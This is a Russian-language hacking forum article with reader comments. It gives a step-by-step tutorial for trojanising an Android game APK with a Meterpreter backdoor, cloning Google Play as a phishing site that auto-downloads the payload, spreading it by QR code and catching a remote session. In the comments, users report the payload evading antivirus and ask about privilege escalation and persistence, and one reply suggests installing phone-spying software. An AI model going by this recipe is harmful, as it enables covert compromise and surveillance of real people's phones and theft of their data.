• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья Взлом Android - устройства. (Backdoor-apk + HTA server)

Всем привет! В этой теме я хочу показать еще один способ взлома Android – устройства, на мой взгляд, не сложный, но действенный. Использовать будем QR-код, HTA – сервер и естественно Kali Linux.

upload_2016-12-5_13-26-37.png


Для начала нам потребуется софт, для того, чтобы поместить полезную нагрузку в APK – файл. Мы будем использовать Backdoor-apk, скачаем его с Github командой:

> git clone https://github.com/dana-at-cp/backdoor-apk.git

upload_2016-12-5_13-27-3.png


Затем установим все необходимые библиотеки.

> apt-get install lib32stdc++6 lib32ncurses5 lib32z1

upload_2016-12-5_13-27-30.png


Теперь нам понадобится приложение, в которое мы будем «вшивать» полезную нагрузку, для этого перейдем на сайт apk4fun.com и выберем понравившееся. Сразу оговорюсь, что я перепробовал порядка ста приложений, но большинство из них не компилировалось, при попытке записать нагрузку в него. Еще какая-то часть работала с ошибками. Так же я сталкивался с проблемой, когда сессия отваливались по прошествии 30 – 50 сек после открытия. А именно, когда телефон уходил в ждущий режим и гас экран.

Был интересный момент c Viber, пару раз мне удавалось «вызвать» сессию тогда когда мне было нужно, просто написав сообщение жертве. Но потом эксперимент провалился, приложение перестало работать от слова совсем.


Итак, после нескольких часов тестов я остановился на игре 2048. Как это ни забавно, но именно она работала стабильнее всего, и сессия meterpreter работала корректно.

Качаем именно эту версию, так как другие я просто не пробовал:

upload_2016-12-5_13-29-42.png


Сохраняем файл:

upload_2016-12-5_13-30-4.png


Затем скопируем файл в папку с установленным Backdoor-apk.

upload_2016-12-5_13-30-20.png


Теперь, выполняя по очереди следующие команды, создадим файл с полезной нагрузкой:

> cd backdoor-apk

> cd backdoor-apk

> ./backdoor-apk.sh com.digiplex.game-2.7.2.apk (я сократил ему имя)

upload_2016-12-5_13-30-55.png


Выбираем параметры соответствующие нашим требованиям, я провожу эксперимент в пределах своей локальной сети.

upload_2016-12-5_13-31-17.png


Этот процесс сгенерирует готовый файл в директорию, в моем случае, /root/backdoor-apk/backdoor-apk/original/dist

upload_2016-12-5_13-31-53.png

upload_2016-12-5_13-31-59.png


На этом пока остановимся.

Пришло время запустить SET - Social Engineering Toolkit – набор инструментов для социальной инженерии. Вектор выбранной атаки – это клонирование сайта Google Play и скачивания игры 2048 именно с нашего, клонированного сайта. Дальнейшие действия не должны выходить за рамки приведенной ниже инструкции. Запускаем SET:


> setoolkit

Выбираем:

upload_2016-12-5_13-32-59.png


Выберем Website Attack Vectors.

upload_2016-12-5_13-33-17.png


Нас интересует HTA – Attack Method.

upload_2016-12-5_13-33-53.png


Следующий выбранный пункт – это ввод адреса сайта, который мы склонируем. Базироваться он будет нашей локальной сети, и единственная его цель, это доставить игру с полезной нагрузкой на смартфон цели. Так как по легенде это игра, то клонируем Google Market.

> https://play.google.com/store


upload_2016-12-5_13-38-50.png


Опции, которые будет запрашивать SET вы можете вводить такие же, как и при создании .apk файла. В моем случае 192.168.0.101 и порт 4444. Позже мы все изменим. Терминал с запущенным SET не закрываем.
Итак, Apache работает, ложный сайт склонирован. Если зайдем на адрес 192.168.0.101 с любого компьютера в нашей сети, то в случае успеха, попадем на фэйковый Google Play.

upload_2016-12-5_13-39-52.png


Теперь необходимо инициировать скачивание файла с нашей игрой сразу после перехода на сайт, для этого выполним следующие действия:

· Копируем файл с полезной нагрузкой в директорию /var/www/html (На Kali Linux машине)

· В файле index.html меняем указанную строку. Впишем туда название файла с игрой, но предварительно переименуем ее в Launcher.apk (Ctrl+F поиск по файлу)

upload_2016-12-5_13-40-34.png


Теперь, зайдя на страницу по адресу 192.168.0.101, мы не просто попадаем на ложный Google Play, но и скачиваем автоматически нашу игру 2048 переименованную в Launcher.apk.

upload_2016-12-5_13-41-38.png


Теперь мы оптимизируем процесс установки нашего приложения на целевое устройство.

Для начала установим расширение The QR Code Extension в наш браузер. Я использую Google Chrome.

upload_2016-12-5_13-42-7.png


На целевом устройстве должно присутствовать приложение для считывания QR – кодов, например, QR – Code Reader:

upload_2016-12-5_13-42-29.png


Перейдем на наш фейковый сайт Google Play и сгенерируем QR – код ссылку на него.

upload_2016-12-5_13-42-51.png


Просканировав QR – код с нашего целевого устройства мы скачиваем наш файл с полезной нагрузкой.

Установим игру.

upload_2016-12-5_13-43-11.png


Для получения сессии meterpreter, заранее запустим на исполнение файл backdoor-apk.rc командой:

> msfconsole –r backdoor-apk.rc

upload_2016-12-5_13-43-39.png


И затем, запустим игру.

upload_2016-12-5_13-44-4.png


В консоли получаем активную сессию meterpreter.

upload_2016-12-5_13-44-20.png


На этом все, спасибо за внимание.
 
U

Ubop0202

Я пожалуй присоединюсь))
Vander, можете подсказать приложение, чтобы наоборот мой apk присоеденился к оригинальной apk? то есть не как у вас в гайде, где к оригинальному apk приделывается payload...
надеюсь понятно написал)
 
K

kai77

Здравствуйте. У меня проблемка. Когда пишу ./backdoor-apk.sh original.apk , пишет
Original APK file specified does not exist.
P.S. С АПК всё нормально.
 
F

ffddffdseffe

Два часа мучений и у меня получилось сгенерировать файлик. Причем его не видит антивирус сбербанка онлайн. Но увы кроме открытия левых страничек и проигрывания композиций на взломанном устройстве больше ничего не выходит. Пошариться в директориях нельзя, получить изображение с камеры тоже. Андроид 7.0 везде ошибка operation failed : 1 . Кто подскажет как можно поднять привелегии?
 

DarkDepth

Green Team
17.02.2019
79
20
BIT
0
Шо делать если...

E: Невозможно найти пакет lib32stdc++6
E: Не удалось найти ни один пакет с помощью регулярного выражения «lib32stdc++6»
E: Невозможно найти пакет lib32ncurses5
E: Невозможно найти пакет lib32z1

Или это не так важно?
 

jonni_vu

Green Team
24.06.2017
43
8
BIT
0
Друзья, почему не могу попасть в деректорию sdcard? Хочу закинуть туда .sh .Подскажите другие варианты закрепления в android .
 

Вложения

  • Снимок экрана от 2019-05-19 00-16-07.png
    Снимок экрана от 2019-05-19 00-16-07.png
    46,5 КБ · Просмотры: 352

DarkDepth

Green Team
17.02.2019
79
20
BIT
0
Друзья, почему не могу попасть в деректорию sdcard? Хочу закинуть туда .sh .Подскажите другие варианты закрепления в android .
Не так писал.) Чекай.)
cd /storage/emuladet/0 И всё потом dir или ls. А не соре.. ЗАметил что писал, возможно нужны рут, но сегодня проверю, отпишу в люблом случае. Но если это не пробовал попробуй cd /storage/emuladet/0 можешь скачать софт, для слежки за телефоном, в новой верии msf можно устанавливать приложение через метерпретер. А через софт с граф оболочкой, думаю легче будет.
 
  • Нравится
Реакции: jonni_vu

DanaAnLOX

Member
15.06.2020
7
0
BIT
0
Ну у меня две проблемы:
Не устанавливается lib32ncurse5 для backdoor-apk
И ещё программа не может найти baksmali
 
16.06.2020
2
0
BIT
0
Это по беды, было вообще какая то фигня по поводу частичного управления хуавей на телефоне. И без него нормально контролируется обьект
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!